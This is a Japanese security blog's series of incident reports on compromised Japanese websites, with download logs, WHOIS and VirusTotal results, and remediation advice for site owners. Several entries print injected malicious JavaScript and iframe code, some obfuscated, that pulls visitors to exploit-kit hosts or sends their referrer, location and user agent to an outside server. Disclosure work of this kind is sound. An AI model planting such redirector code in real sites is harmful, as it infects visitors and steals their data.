土曜日, 9月 29, 2012

#OCJP-071:「www.osakanightlife101.net / 210.172.144.178」にTDS Sutraマルウェアの感染URLを発見!

GMOネットワークにあるホストは↓
inetnum:        210.172.128.0 - 210.172.191.255
netname:        INTERQ
descr:          GMO Internet, Inc.
country:        JP
下記のURL(ダウンロード証拠)↓
--22:41:46--  hxxp://www.osakanightlife101.net/?p=87
           => `index.html@p=87'
Resolving www.osakanightlife101.net... 210.172.144.178
Connecting to www.osakanightlife101.net|210.172.144.178|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
22:41:47 (40.34 KB/s) - `index.html@p=87' saved [29129]

ダウンロードしたindex.htmlファイルに下記のマルウェア感染コードを発見し↓


↑解けたら<script>と<iframe>のコードを発見↓
<script>document.write("<script src=\"" + "hxxp://itsallbreaksoft・net/tds/in. cgi?2&seoref=" + 
encodeURIComponent(document.referrer) + "¶meter=$keyword&se=$se&ur=1&hxxp_REFERER=" + 
encodeURIComponent(document.URL) + "&default_keyword=notdefine" + "\"><\/script>");
</script>
<script>if (typeof (h) == "undefined"){
  document.write("<iframe src='hxxp://itsallbreaksoft・net/tds/in. cgi?3&seoref=" + 
  encodeURIComponent(document.referrer) + "¶meter=$keyword&se=$se&ur=1&hxxp_REFERER=" + 
  encodeURIComponent(document.URL) + 
  "&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>");
}
else if (h.indexOf("hxxp:") == 0){
  window.location = h;
}</script>
↑また解けたらマルウェアの転送先のURLが分かりました、①JSコード↓
<script src=
"hxxp://itsallbreaksoft・net/tds/ in. cgi?2&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fsnopfnopfsno.com%2F&default_keyword=notdefine"></script>
②IFRAMEコード↓
<iframe src=
'hxxp://itsallbreaksoft・net/tds/ in. cgi?3&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fsnopfnopfsno.com%2F&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0>
</iframe>

その2つURLはTDS Sutra Exploit Kit/マルウェアのリクエアストin.cgiファイルです。
感染サーバのネットワーク情報は↓
Host: itsallbreaksoft・net
IP: 64.74.223・37
Network: AS21740 eNom, Incorporated
What's this? TDS Sutra request in.cgi file
感染されると下記のような動きとなります↓

アクセスしたら下記の画面が出ましたが…


ブラウザーのログを見たら感染動きを発見しました、最初はこんな感じ…
[HTTP] URL: %上記のURL% (Status: 200, Referrer: None)

JSファイルをロードされて、JSコードを実行されると…
[Navigator URL Translation] ./js/standard・js?rte=1&tm=2&dn=itsallbreaksoft・net&tid=1016 -->  ./js/standard.js?rte=1&tm=2&dn=itsallbreaksoft・net&tid=1016
[HTTP] URL: hxxp://itsallbreaksoft・net/js/standard・js?rte=1&tm=2&dn=itsallbreaksoft・net&tid=1016 (Status: 200, Referrer: hxxp://itsallbreaksoft・net/tds/in.cgi?3&seoref=¶meter=&se=&ur=1&HTTP_REFERER=http%3A%2F%2Fsnopfnopfsno.com%2F&default_keyword=notdefine)

[HTTP] URL: hxxp://as・casalemedia・com/sd?s=124463&f=1 (Status: 200, Referrer: hxxp://itsallbreaksoft・net/tds/in.cgi?3&seoref=¶meter=&se=&ur=1&HTTP_REFERER=http%3A%2F%2Fsnopfnopfsno.com%2F&default_keyword=notdefine)
[HTTP Redirection (Status: 302)] Content-Location: hxxp://as・casalemedia・com/sd?s=124463&f=1 --> Location: hxxp://as・casalemedia・com/sd?s=124463&f=1&C=1
ここでマルウェアダウンローダーActiveXが動きました↓
ActiveXObject: msxml2.xmlhttp
[Microsoft XMLHTTP ActiveX] open('GET', '/6bab5857-f8c5-40cf-b795-560d862beed7.ippi?g=6bab5857-f8c5-40cf-b795-560d862beed7', True)
[Microsoft XMLHTTP ActiveX] send
[Microsoft XMLHTTP ActiveX] Fetching from URL ./6bab5857-f8c5-40cf-b795-560d862beed7.ippi?g=6bab5857-f8c5-40cf-b795-560d862beed7 (method: GET)
[Microsoft XMLHTTP ActiveX] Saving File: d41d8cd98f00b204e9800998ecf8427e
↑本件には、これでマルウェアがダウンロードされます。

あるサイトから勝てに取った情報なんですけど、
こういう連携でファイルをダウンロードされます↓


Virus Totalに確認しましたら、既に感染コードの検知率が高い状況です↓
MD5:          1d69b910e05a3f2fa81bacb642279af6
File size:    28.4 KB ( 29129 bytes )
File name:    index.html
File type:    HTML
Detection:    33 / 42
Date:         2012-09-28 17:06:03 UTC ( 0 分 ago ) 
URL:          [CLICK]
そのHTML感染ページについてのマルウェア名は↓
nProtect                 : Trojan.JS.Iframe.AED
CAT-QuickHeal            : JS/Clicker.ACK
McAfee                   : JS/Wonka
K7AntiVirus              : Trojan
F-Prot                   : JS/Dccrypt.B
Norman                   : JS/Iframe.GQ
TotalDefense             : JS/Psyme.AF
TrendMicro-HouseCall     : JS_WONKA.SM
Avast                    : JS:Small-C [Trj]
Kaspersky                : Trojan-Clicker.JS.Agent.ma
BitDefender              : Trojan.JS.Iframe.AED
Agnitum                  : JS.Wonka.Gen
Sophos                   : JS/ScrLd-C
Comodo                   : TrojWare.JS.Agent.bln
F-Secure                 : Trojan.JS.Iframe.AED
DrWeb                    : VBS.Psyme.377
VIPRE                    : Trojan-Downloader.JS.Inor.a (v)
AntiVir                  : JS/Clicker.CA
TrendMicro               : JS_WONKA.SM
McAfee-GW-Edition        : JS/Wonka
Emsisoft                 : Trojan-Downloader.JS.Psyme!IK
Jiangmin                 : Trojan/Script.Gen
Microsoft                : TrojanClicker:HTML/Iframe.J
GData                    : Trojan.JS.Iframe.AED
Commtouch                : JS/Dccrypt.B
AhnLab-V3                : JS/Iframe
PCTools                  : 9811
ESET-NOD32               : JS/Agent.NCA
Rising                   : Trojan.Clicker.Script.JS.Wonka.a
Ikarus                   : Trojan-Downloader.JS.Psyme
Fortinet                 : JS/Inor.A!tr.dldr
AVG                      : JS/Downloader.Agent
Panda                    : JS/Exploit.T

↑という事で、説明は以上です。

本感染についてはGoogleで検索したらWordPressハッキンッグのせいで沢山
ウェブページが感染されたと分かりました↓

感染コードが入ったindex.htmlに書いたマルウェアコードを削除して下さい。
そのURLは既にスパムメールにリンクされていますので、早めに行動して欲しいです。
また、WordPressの脆弱性を直して、念のためにFTPアクセス情報を早めに変更して下さい。

金曜日, 9月 28, 2012

#OCJP-070:「www.qi-inc.com/157.205.141.15」のBlackhole V2の感染された事件について

本日、17時間前に下記のURLにスパムメールに発見されました↓
hxxp://157.205.141.15/ABtH6Xj/index.html
hxxp://www.qi-inc.com/ABtH6Xj/index.html
感染されたIPは日本なので、下記のネットワークです↓
AS17514 JPNIC-JP-ASN-BLOCK Japan Network Information Center
157.205.0.0/16 OTSUKA CORPORATION X-Keiro: noc(at)aics.ad.jp
下記のHTMLファイルを発見しました。
00000000 3c 68 74 6d 6c 3e 0d 0a 3c 68 31 3e 57 41 49 54  <html>..<h1>WAIT
00000010 20 50 4c 45 41 53 45 3c 2f 68 31 3e 0d 0a 20 3c  PLEASE</h1>.. <
00000020 68 33 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 68  h3>Loading...</h
00000030 33 3e 0d 0a 20 3c 73 63 72 69 70 74 20 74 79 70  3>.. <script typ
00000040 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69  e="text/javascri
00000050 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f  pt" src="hxxp://
00000060 6d 65 6f 77 63 68 69 63 61 67 6f 2e 6e 65 74 2f  meowchicago.net/
00000070 48 6f 59 67 61 69 56 61 2f 6a 73 2e 6a 73 22 3e  HoYgaiVa/js.js">
00000080 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 3c 2f 68 74  </script>...</ht
00000090 6d 6c 3e                                         ml> 
中身はマルウェア感染サイトにあるJSコードを実行される
<html><h1>WAIT PLEASE</h1><h3>Loading...</h3>
<script type="text/javascript" src="hxxp://meowchicago.net/HoYgaiVa/js.js">
</script></html>     
感染URLのパターンを見たらBLACKHOLEの感染仕組みだと分かっています。
念のためにVirusTotalサイトに確認しましょう↓
MD5: c327e6944090ffc115a40beb659adb43
File size: 147 バイト ( 147 bytes )
File name: index.html
File type: HTML
Tags: html
Detection: 16 / 43 ←マルウェアが検知されますね!
URL: [CLICK]

そのドメインは下記のIPに向いています(DNS情報)↓
;; QUESTION SECTION:
;www.qi-inc.com.                        IN      A

;; ANSWER SECTION:
www.qi-inc.com.         3600    IN      A       157.205.141.15

;; AUTHORITY SECTION:
qi-inc.com.             3600    IN      NS      gntdns03.alpha-plt.jp.
qi-inc.com.             3600    IN      NS      gntdns02.alpha-plt.jp.
qi-inc.com.             3600    IN      NS      gntdns01.alpha-plt.jp.
ネットワーク情報↓
inetnum:        157.205.0.0 - 157.205.255.255
netname:        JOINUS-NET
country:        JP
descr:          Otsuka Corporation
admin-c:        OT27-AP
tech-c:         OT27-AP
ですが、お名前.COMでドメインを取ったみたいですね↓
Domain Name: qi-inc.com
Created On: 1996-09-21 00:00:00.0
Last Updated On: 2012-09-20 00:17:12.0
Expiration Date: 2013-09-20 04:00:00.0
Status: ACTIVE
Registrant Name: QI Incorporated
Registrant Organization: QI Incorporated
Registrant Street1: 2-4-7 Fukuura Kanazawa-ku
Registrant City: Yokohama-city
Registrant State: kanagawa
Registrant Postal Code: 236-0004
Registrant Country: JP
Registrant Phone: 9999999999
Registrant Email: admin(at)onamae.com
ホームページまでに内容を確認しました↓

↑マルウェアサイトじゃないですね。何故感染URLが発見されたかと調査しました…
結果、古いPHPバーションの脆弱性が入っていますので、その経由で
BLACKHOLE(バーション2)にマルウェアページがインジェクトされた可能性があります。
もう一つ可能性として、FTPアカウントが漏れてしまいました。
提供されているPHPバーション情報をみたら古いバーションが使っていますね。
HTTP/1.1 200 OK
Date: Thu, 27 Sep 2012 16:20:25 GMT
Server: Apache
X-Powered-By: PHP/4.4.1 ←結構古い
Set-Cookie: PHPSESSID=9642b25059d9dcb79545e64eb5532aec; expires=Thu, 27 Sep 2012 17:20:25 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

PHP/4.4.1の脆弱性は沢山ありますので、詳細な脆弱性の一覧は【こちらへ】
FTP情報が漏れた場合、私の海外研究者は新しい発見した物があり、ZeuSマルウェアが盗んだ個人情報のサイトです。イメージ的には【こちら】のウェブページへご覧下さい。
【2012年9月28日の追加情報】【重要】調査を続きましたが、結果:上記のマルウェアサイトに本事件のFTPアカウントを発見しましたので、早めにFTPアカウントを変更して下さい!お願いします。

水曜日, 9月 26, 2012

#OCJP-069:「kannon8.com/202.172.28.76」DR-NET/Digirockネットワークにあるウェブサーバはマルウェア感染コードをインジェクトされました。

下記のURLに↓
http://kannon8.com/cookie/cookie0h/index.htm
ダウンロードしたら↓
Resolving kannon8.com... 202.172.28.76
Connecting to kannon8.com|202.172.28.76|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7,375 (7.2K) [text/html]
20:11:43 (1.20 MB/s) - `index.htm' saved [7375/7375]
HTMLの最後の所にマルウェアのSCRIPTを発見↓
<script>var I;if(I!='h' && I!='
& d!='O'){d='y_'};var A=D['unes
w Array();var l=new Array();var
!=''){P='mV'};return xO.replace
  :
_Y'){Rx='Im'};var yr=x('o0nZljo7a1d4','
p0eJ_yHBK4RD17jIZzuC');D[yr]=Z;};
var FI;if(FI!='TT'){FI='TT'};z();</script>
下記の転送先のマルウェアサイトURLが書いてあります↓
var A=D['unescape'];
this.TG="";
var G=A("%2f%77%68%6f%2d%69%73%2f%67%6f%6f%67%6c%65%2e%63%6f
%6d%2f%72%65%74%61%69%6c%6d%65%6e%6f%74%2e%63%6f%6d%2e%70%68%70");
function x(xO,v)
解けたら、下記の転送先URLを発見↓
hxxp://cityrealtimes.info:8080/who-is/google.com/retailmenot.com.php 

#OCJP-068: 「smilekidsroom.com./210.134.55.213」の感染事件、Kagoya Japan/KIRネットワークにあるウェブサーバにWP脆弱性があり、マルウェア転送コードを発見されました

下記のURLとダウンロード証拠↓
--19:36:30--  hxxp: // smilekidsroom.com/wp/
           => `index.html'
Resolving smilekidsroom.com... 210.134.55.213
Connecting to smilekidsroom.com|210.134.55.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
19:36:31 (361.00 KB/s) - `index.html' saved [28436]
マルウェア感染コードを発見しました。WPの脆弱性経由でインジェクトされたそうです。
index.htmlのライン521にインジェクトされたマルウェアのredirectorコードを発見↓
<a href="hxxp: // smilekidsroom.com/wp/?m=20120913" 
title="当園のご見学について<script type="text/javascript" 
src="hxxp: // asaunirg.com.br/js/0day.php"></script>">
ブラウザーで実行したら下記のURLにユーザが飛ばされます↓
hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571 
↑exploit kit 感染URL(landing page)
HTTPのセッションログ↓
[HTTP] URL: hxxp: // smilekidsroom.com/wp/ (Status: 200, Referrer: None)
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta content="text/javascript" http-equiv="Content-Script-Type"/>
<meta content="text/css" http-equiv="content-style-type"/>
<meta content="Copyright (C) SMILE KIDS ROOM All Rights Reserved." name="copyright"/>
<meta content="SMILE KIDS ROOM" name="Author"/>
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-content/themes/smilekidsroom/js/jquery.js (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-content/themes/smilekidsroom/js/jquery.cookie.js (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-content/themes/smilekidsroom/js/pagetop.js (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-con‰åР参,24時間,é§…,ãæ™‚間駅型俒å…éšæ™‚募集中ï¼SMILE KIDS ROOM" name="Description"/>om/wp/)
<meta content="ä¿’,è¨—å…æ‰€,埼玉,埼玉県,è¯åŸ¼çŽ‰çœŒè           
[HTTP] URL: hxxp: // asaunirg.com.br/js/0day.php (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/
[HTTP] URL: hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571 (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571 (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
Saving log analysis at ../logs/01cd69508c7a060db5f95e2ecbc550d8/20120926193920
[HTTP] URL: hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571
           => `0day.php@action=jv&h=4571.2'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
ネットワーク責任者の情報↓
inetnum:        210.134.54.0 - 210.134.55.255
netname:        KIR
descr:          Kagoya Japan Corporation
country:        JP
admin-c:        SK1294JP
tech-c:         TS13540JP
※ ドメイン責任者の情報はインターネットで調べられます。

#OCJP-067:「www.trl-y.com/203.183.81.20」に詐欺経由トロイ・トロイ/スパイウェアを発見!

下記のURL/ダウンロード証拠↓
--18:51:11--  
hxxp://www.trl-y.com/admin/topics/img-s/tmp2/Postal_Amigo_0083・exe
           => `Postal_Amigo_0083.exe'
Resolving www.trl-y.com... 203.183.81.20
Connecting to www.trl-y.com|203.183.81.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36,864 (36K) [application/octet-stream]
18:51:11 (191.01 KB/s) - `Postal_Amigo_0083.exe' saved [36864/36864]
下記のスパイウェアを発見↓
MD5: f8130f30f5370d0fa8a5132715c3abfb
File size: 36.0 KB ( 36864 bytes )
File name: Postal_Amigo_0083.exe
File type: Win32 EXE
Tags: peexe
Detection: 20 / 43
URL: [CLICK]

マルウェア名前↓
F-Secure                 : Gen:Trojan.Heur.VP2.cm0@a8K2WgP
DrWeb                    : Trojan.DownLoader6.54403
GData                    : Gen:Trojan.Heur.VP2.cm0@a8K2WgP
VIPRE                    : Trojan.Win32.Generic!BT
Symantec                 : WS.Reputation.1
Norman                   : W32/Troj_Generic.ECWYG
McAfee-GW-Edition        : Artemis!F8130F30F537
TrendMicro-HouseCall     : TROJ_GEN.RCBB1IM
Avast                    : Win32:Spyware-gen [Spy]
Ikarus                   : Trojan.Win32.Spy
CAT-QuickHeal            : (Suspicious) - DNAScan
BitDefender              : Gen:Trojan.Heur.VP2.cm0@a8K2WgP
McAfee                   : Artemis!F8130F30F537
Rising                   : Trojan.Bancos!47A6
Kingsoft                 : Win32.Troj.Undef.(kcloud)
AntiVir                  : TR/Spy.36864.1521
Panda                    : Suspicious file
AVG                      : SHeur4.APMH
Emsisoft                 : Trojan.Win32.Spy!IK
Comodo                   : UnclassifiedMalware
見た目↓

調査サマリー↓
PE Sections:
   .text 0x1000 0x544c 24576
   .data 0x7000 0xc44 4096
   .rsrc 0x8000 0xf80 4096
Compiler:
    Microsoft Visual Basic v5.0 - v6.0
Registry:
   HKLM\Software\Microsoft\Security Center\UACDisableNotify
   HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA
ファイル保存/変更↓
   %System%\wincal.exe ←ずっとプロセスに残っています
   %Temp%C:\~DF7831.tmp
   %System%\drivers\etc\hosts
ネットワークトラフィック↓
   cmawards.com.mx GET /change/change.txt HTTP/1.1

   下記のHTTP回答↓
   HTTP/1.1 200 OK
   Date: Thu, 06 Sep 2012 16:07:12 GMT
   Server: Apache/2
   Last-Modified: Tue, 04 Sep 2012 07:22:41 GMT
   ETag: "73b80ee-44e-4c8db1fa2d240"
   Accept-Ranges: bytes
   Content-Length: 1102
   Vary: Accept-Encoding,User-Agent
   Content-Type: text/plain
   X-Pad: avoid browser bug
【注意】HTTPの回答の中に詐欺銀行サイトの情報を発見、PCのhostの中に書き込まれた↓

手続き責任者↓
inetnum:        203.183.81.0 - 203.183.81.127
netname:        JOES-NET
descr:          Joe's Web Hosting Inc.
country:        JP
admin-c:        YM12293JP

#OCJP-066: 「RAT Co.,Ltdネットワーク/27.96.16.176」ハッキングされたWPサイト(Plugin脆弱性あり)、ツイッター薬アカウントへ転送

脆弱性を早めに直して下さい。さっそく下記は証拠です↓
感染されたURL↓
hxxp://sekiyuhuanhita.ktbha.net/wp-content/plugins/zjhaemcrkom/google.html?qs=zfs.gio&fgw=gyh.jyg&fob=ogrh
調査のダウンロードログ↓
Resolving sekiyuhuanhita.ktbha.net... 27.96.16.176 (RAT Co.,Ltd/RAT-INFRA1/HW3966JP)
Connecting to sekiyuhuanhita.ktbha.net|27.96.16.176|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 226 [text/html]
下記のiframe発見↓
<iframe allowtransparency="true" frameborder="0" scrolling="no" 
src="hxxp://platform.twitter.com/widgets/follow_button.html?screen_name=foxnewshealth&show_screen_name=true&show_count=true" 
style="width:300px; height:20px; margin: 0 0 10px;"></iframe>
ブラウザーセッションのログ↓
[hxxp] URL: hxxp://sekiyuhuanhita.ktbha.net/wp-content/plugins/zjhaemcrkom/google.html?qs=zfs.gio&fgw=gyh.jyg&fob=ogrh (Status: 200, Referrer: None)
<meta content="0; url=hxxp://www.foxnews.com.happyhcgultracustomers.new.12newsclock.com" hxxp-equiv="refresh"/>
[hxxp] URL: hxxp://www.foxnews.com.happyhcgultracustomers.new.12newsclock.com (Status: 200, Referrer: hxxp://sekiyuhuanhita.ktbha.net/wp-content/plugins/zjhaemcrkom/google.html?qs=zfs.gio&fgw=gyh.jyg&fob=ogrh)
[hxxp] URL: hxxp://www.foxnews.com.happyhcgultracustomers.new.12newsclock.com (Status: 200, Referrer: hxxp://sekiyuhuanhita.ktbha.net/wp-content/plugins/zjhaemcrkom/google.html?qs=zfs.gio&fgw=gyh.jyg&fob=ogrh)
[hxxp] URL: hxxps://s-static.ak.fbcdn.net/rsrc.php/v2/yr/r/Q9960T8nf3v.js (Status: 200, Referrer: hxxp://sekiyuhuanhita.ktbha.net/wp-content/plugins/zjhaemcrkom/google.html?qs=zfs.gio&fgw=gyh.jyg&fob=ogrh)
<iframe allowtransparency="true" frameborder="0" scrolling="no" src="hxxp://platform.twitter.com/widgets/follow_button.html?screen_name=foxnewshealth&show_screen_name=true&show_count=true" style="width:300px; height:20px; margin: 0 0 10px;"></iframe>
[iframe redirection] hxxp://sekiyuhuanhita.ktbha.net/wp-content/plugins/zjhaemcrkom/google.html?qs=zfs.gio&fgw=gyh.jyg&fob=ogrh -> hxxp://platform.twitter.com/widgets/follow_button.html?screen_name=foxnewshealth&show_screen_name=true&show_count=true
[hxxp] URL: hxxp://platform.twitter.com/widgets/follow_button.html?screen_name=foxnewshealth&show_screen_name=true&show_count=true (Status: 200, Referrer: hxxp://sekiyuhuanhita.ktbha.net/wp-content/plugins/zjhaemcrkom/google.html?qs=zfs.gio&fgw=gyh.jyg&fob=ogrh)

火曜日, 9月 25, 2012

#OCJP-065: Blackholeバーション2(BHEK2)に感染された日本のサイトを発見されました。

さっそく、感染されたURLは↓
hxxp: // dp38318372.lolipop.jp/b7tLTFTi/ index.html
hxxp: // partners.dhw.co.jp/JkMKX3sv/ index.html
hxxp: // oneonlyjunk.suichu-ka.com/KcbzzRJE/ index.html
hxxp: // dfs.selfip.com/wABe5T/ index.html
本日の確認↓
Checking hxxp: // partners.dhw.co.jp/JkMKX3sv/ index.html ... OK
Checking hxxp: // dfs.selfip.com/wABe5T/ index.html ... OK
Checking hxxp: // dp38318372.lolipop.jp/b7tLTFTi/ index.html ... OK
Checking hxxp: // oneonlyjunk.suichu-ka.com/KcbzzRJE/ index.html ... OK
情報↓
dp38318372.lolipop.jp       210.172.144.27  INTERQ/GMO
partners.dhw.co.jp          113.33.102.91   Digital Hollywood Co.,Ltd./UCOM
oneonlyjunk.suichu-ka.com   112.140.42.29   Samurai Factory Inc./BI-CDN-IX/Bit Isle
dfs.selfip.com              121.82.134.118  K-OPTICOM(OSK)
追加情報↓
ソースは海外のスパムメールに感染されたURL(K-SHIELD製品のフィルターログ調査)
現状手続き最中です。
本件の感染情報についてご注意をお願いします。
【感染方法】感染仕方についての調査結果↓
lolipop.jpとpartners.dhw.co.jpのドメインについて、【こちら】に報告されたマルウェアサイトにFTPのログイン情報を発見しました。その経由でマルウェアHTMLページを入れたそうですすので、アカウント情報とパスワードを変更して下さい。残りのドメインについて、同じ感染仕方で感染された可能性が高いですので、ご注意下さい、アカウントのログイン・パスワードを変更して下さい。
K-SHIELD製品について

金曜日, 9月 21, 2012

#OCJP-064: あやしいconf2.phpホスト@日本IDC「61.205.55.43,54,55」

人事だけかも知れないけど、さっそく、何故かあやしいかと…
2ヶ月前からっずっとジーと見ました。アップタイムはこんな感じで↓
61.205.55.43 Uptime 21.833 days
61.205.55.54 Uptime 24.215 days
61.205.55.55 Uptime 49.229 days
そのアップタイムによって下記の感染ページ/ダウンローダーを発見↓
hxxp://hudehude.net/conf2.php (9月20日)
hxxp://hulsx.net/conf2.php (9月20日)
さらに履歴を見たら色んなドメインを使ってます↓
hxxp://fekefeke.net/conf2.php  (9月15日)
hxxp://axksl.net/conf2.php (9月14日)
hxxp://praves.net/conf2.php (9月1日)
なので、直接ダウンロードはゼロバイト↓
--22:06:38--  hxxp://hulsx.net/conf2.php
           => `conf2.php'
Resolving hulsx.net... 61.205.55.43
Connecting to hulsx.net|61.205.55.43|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
22:06:38 (0.00 B/s) - `conf2.php' saved [0/0]
※残りの2件は同じように…
その他ネットワークからだとyahooへ飛ばされます…
--22:07:23--  http://hulsx.net/conf2.php
           => `conf2.php.2'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 302 Found
Location: http://yahoo.com/ [following]
--22:07:25--  http://yahoo.com/
           => `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 301 Moved Permanently
Location: http://www.yahoo.com/ [following]
--22:07:27--  http://www.yahoo.com/
           => `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 302 Found
Location: http://uk.yahoo.com/?p=us [following]
--22:07:29--  http://uk.yahoo.com/?p=us
           => `index.html@p=us'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: unspecified [text/html]
※残りの2件は同じように…
↑どう見てもexploit packっぽいですので、注意して監視した方がいいと思う… 直ぐに別のドメインで出て、また無くなってきました…だからあやしいです。 因みに国内のVPSネットワークですね。

#OCJP-063: 「182.48.9.228/glamb.sakura.ne.jp」の変な感染コード…

では、さくっと!下記のURL↓
h00p://glamb.sakura.ne.jp/glamb_shop/wd/wp-content/themes/main-fi
es/humax/js/DD_belatedPNG.js
ダウンロードしたら↓
//fetch...
--21:27:39--  h00p://glamb.sakura.ne.jp/glamb_shop/wd/wp-content/themes/main-fi
es/humax/js/DD_belatedPNG.js
           => `DD_belatedPNG.js'
Resolving glamb.sakura.ne.jp... 182.48.9.228
Connecting to glamb.sakura.ne.jp|182.48.9.228|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 14,576 (14K) [application/javascript]
100%[====================================>] 14,576        --.--K/s
21:27:41 (325.37 KB/s) - `DD_belatedPNG.js' saved [14576/14576]
下記のコードを発見↓
// contanins what looks like malicious code in DD_belatedPNG.js 
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\
x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28
\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2
  :
C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","
","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x
3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x
3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0
xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString
(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];
_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if
(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_
0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _
0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
解けたら↓
element=document.getElementById('dgllhguk');if(!element){hghjghjhjgjh=document.
location;hghjhjhjg=escape(document.referrer);ugkkjkj=escape(navigator.userAgent
);var js=document.createElement('script');js.id='dgllhguk';js.src='h00p://91.19
6.216.64/s.php?ref='+hghjhjhjg+'&lc='+hghjghjhjgjh+'&ua='+ugkkjkj;var head=docu
ment.getElementsByTagName('head')[0];head.appendChild(js)}
読みにくい…、綺麗にすると↓
element=document.getElementById('dgllhguk');
 if(!element)
 {
   hghjghjhjgjh=document.location;
   hghjhjhjg=escape(document.referrer);
   ugkkjkj=escape(navigator.userAgent);
   var js=document.createElement('script');
   js.id='dgllhguk';
   js.src='h00p://91・196・216・64/s.php?ref='+hghjhjhjg+'&lc='+hghjghjhjgjh+'&ua='+ugkkjkj;
   var head=document.getElementsByTagName('head')[0];
   head.appendChild(js) }
もう少し頑張ったら↓
h00p://91・196・216・64/s.php?ref=referrer&cls=colorDepth&\
      sw=width&sh=height&dc=charset&lc=location&ua=userAgent
↑びみような感じ…こんなコードだけだと何故か汚いやり方でやったわけかよ… 何物かと…
IP:             91.196.216.64  //ロシア
inetnum:        91.196.216.0 - 91.196.219.255
netname:        SPETSENERGO-NET
descr:         SpetsEnergo Ltd.
現在は:
91.196.216.64 [host down]
になった。

月曜日, 9月 17, 2012

#OCJP-062: 「 mt-sakura.iivoice.com. / 210.172.99.214」 GUMBLARマルウェアサイトの転送コードを発見!

下記のURL+ダウンロード証拠↓
--18:46:43--  hxxp:// mt-sakura・iivoice・com/html/13.html
           => `13.html'
Resolving mt-sakura・iivoice・com... 210.172.99.214
Connecting to mt-sakura.iivoice.com|210.172.99.214|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,933 (6.8K) [text/html]
18:46:43 (1.20 MB/s) - `13.html' saved [6933/6933]
日本KDDIのネットワーク(DION)↓
inetnum:        210.172.99.0 - 210.172.99.255
netname:        KDDI-NET
descr:          DION (KDDI CORPORATION)
country:        JP
admin-c:        JP00000127
tech-c:         JP00000181
13.htmlに下記のマルウェアコードを発見(危ないコードをneutralizedしました)↓
<script language=javascript><!-- 
